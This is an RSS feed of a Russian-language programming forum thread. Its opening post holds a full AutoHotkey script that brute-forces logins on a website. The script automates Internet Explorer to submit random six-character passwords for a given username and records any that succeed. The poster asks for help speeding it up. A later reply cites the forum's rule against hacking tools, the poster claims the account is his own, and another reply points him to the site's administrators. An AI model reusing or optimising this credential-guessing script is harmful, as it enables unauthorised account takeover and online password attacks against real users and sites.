<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title><![CDATA[Серый форум &mdash; AHK: Брутфорс паролей на сайте]]></title>
		<link>http://forum.script-coding.com/viewtopic.php?id=18394</link>
		<atom:link href="http://forum.script-coding.com/extern.php?action=feed&amp;tid=18394&amp;type=rss" rel="self" type="application/rss+xml" />
		<description><![CDATA[Недавние сообщения в теме «AHK: Брутфорс паролей на сайте».]]></description>
		<lastBuildDate>Wed, 12 Mar 2025 20:49:27 +0000</lastBuildDate>
		<generator>PunBB</generator>
		<item>
			<title><![CDATA[Re: AHK: Брутфорс паролей на сайте]]></title>
			<link>http://forum.script-coding.com/viewtopic.php?pid=162076#p162076</link>
			<description><![CDATA[<p><strong>41key</strong> Обратитесь к администрации сайта.</p>]]></description>
			<author><![CDATA[null@example.com (__Михаил__)]]></author>
			<pubDate>Wed, 12 Mar 2025 20:49:27 +0000</pubDate>
			<guid>http://forum.script-coding.com/viewtopic.php?pid=162076#p162076</guid>
		</item>
		<item>
			<title><![CDATA[Re: AHK: Брутфорс паролей на сайте]]></title>
			<link>http://forum.script-coding.com/viewtopic.php?pid=162070#p162070</link>
			<description><![CDATA[<p><strong>__Михаил__</strong>, он не для взлома. Я пароль забыл и из того что помню собрал, но даже так скорость маленькая, на брут уйдет минимум 7 лет. Ведь правильный 1 из 2 176 782 336.</p>]]></description>
			<author><![CDATA[null@example.com (41key)]]></author>
			<pubDate>Tue, 11 Mar 2025 15:00:49 +0000</pubDate>
			<guid>http://forum.script-coding.com/viewtopic.php?pid=162070#p162070</guid>
		</item>
		<item>
			<title><![CDATA[Re: AHK: Брутфорс паролей на сайте]]></title>
			<link>http://forum.script-coding.com/viewtopic.php?pid=162069#p162069</link>
			<description><![CDATA[<p><strong>41key</strong>, В правилах же написано: </p><div class="quotebox"><blockquote><p>Запрещается поиск на форуме программ и алгоритмов для взлома...</p></blockquote></div>]]></description>
			<author><![CDATA[null@example.com (__Михаил__)]]></author>
			<pubDate>Tue, 11 Mar 2025 14:51:12 +0000</pubDate>
			<guid>http://forum.script-coding.com/viewtopic.php?pid=162069#p162069</guid>
		</item>
		<item>
			<title><![CDATA[AHK: Брутфорс паролей на сайте]]></title>
			<link>http://forum.script-coding.com/viewtopic.php?pid=162068#p162068</link>
			<description><![CDATA[<p>Написал код. который брутфорсит пароли на определенном сайте, но все таки есть вопрос: Можно ли его как-то оптимизировать и ускорить? При открытии множественных экземплярах нагрузка на ЦП большая, а разница в скорости маленькая.</p><div class="codebox"><pre><code>
#KeyHistory 0
#SingleInstance Off
SetBatchLines -1

if !FileExist(&quot;settings.ini&quot;)
{
	IniWrite, nick, settings.ini, Nick, NickKey
	IniWrite, site, settings.ini, Nick, SiteKey
}
{
	IniRead, nick, settings.ini, Nick, NickKey
	if (nick ==  &quot;ERROR&quot;)
	{
		IniWrite, nick, settings.ini, Nick, NickKey
	}
	IniRead, site, settings.ini, Nick, SiteKey
	if (nick ==  &quot;ERROR&quot;)
	{
		IniWrite, site, settings.ini, Nick, SiteKey
	}
}
{
	{
		If A_IsCompiled = 1
		Menu, Tray, NoStandard
		Menu, Tray, Add, Показать окно, VisibleSS
		Menu, Tray, Add, Рестарт, ReloadApp
		Menu, Tray, Add, Выкл, CloseApp
		alfavit = 1|2|3|4|5|6|7|8|9|0|a|b|c|d|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|e
		StringSplit, vivod, alfavit, |
		IniRead, nick, settings.ini, Nick, NickKey
		IniRead, site, settings.ini, Nick, SiteKey
		NotPass := nick &quot;.txt&quot;
		nick := nick
		Visible := 0
		ie := ComObjCreate(&quot;InternetExplorer.Application&quot;)
		If (Visible = 1)
		ie.Visible := Visible
		ie.Navigate(site)
		While (ie.busy) || !(ie.document.Readystate = &quot;Complete&quot;)
		Sleep, 1
		Loop
		{
			Random, randomcifra1, 1, 36
			Random, randomcifra2, 1, 36
			Random, randomcifra3, 1, 36
			Random, randomcifra4, 1, 36
			Random, randomcifra5, 1, 36
			Random, randomcifra6, 1, 36
			random1cifra = % vivod%randomcifra1%
			random2cifra = % vivod%randomcifra2%
			random3cifra = % vivod%randomcifra3%
			random4cifra = % vivod%randomcifra4%
			random5cifra = % vivod%randomcifra5%
			random6cifra = % vivod%randomcifra6%
			pass := random1cifra random2cifra random3cifra random4cifra random5cifra random6cifra
			FileRead, nickpassread, %NotPass%
			if !(InStr(nickpassread, pass))
			{
				nickpassread :=
				ie.document.getElementsByName(&quot;login&quot;)[0].Value := nick
				ie.document.getElementsByName(&quot;password&quot;)[0].Value := pass
				ie.document.getElementsByClassName(&quot;btn btn-warning btn-lg btn-block&quot;)[0].Click()
				While (ie.busy) || !(ie.document.Readystate = &quot;Complete&quot;)
				Sleep, 1
				If !(InStr(ie.Document.body.innerHTML, &quot;Введенный пароль не подходит к нику&quot;))
				{
					FileAppend Ник: %nick% Пароль: %pass%, YesBrutPass.txt
					MsgBox, Ник: %nick% Пароль: %pass%
					ie.Quit()
					ExitApp
				}
				FileAppend, %pass%`n, %NotPass%
			}
		}
	}
	Return
	
	VisibleSS:
	{
		If Visible = 1
		{
			Visible = 0
			ie.Visible := 0
		}
		else
		{
			Visible = 1
			ie.Visible := 1
		}
	}
	return
	
	ReloadApp:
	{
		ie.Quit()
		Reload
	}
	Return

	CloseApp:
	{
		ie.Quit()
		ExitApp
	}
	Return

}
</code></pre></div>]]></description>
			<author><![CDATA[null@example.com (41key)]]></author>
			<pubDate>Tue, 11 Mar 2025 14:18:35 +0000</pubDate>
			<guid>http://forum.script-coding.com/viewtopic.php?pid=162068#p162068</guid>
		</item>
	</channel>
</rss>
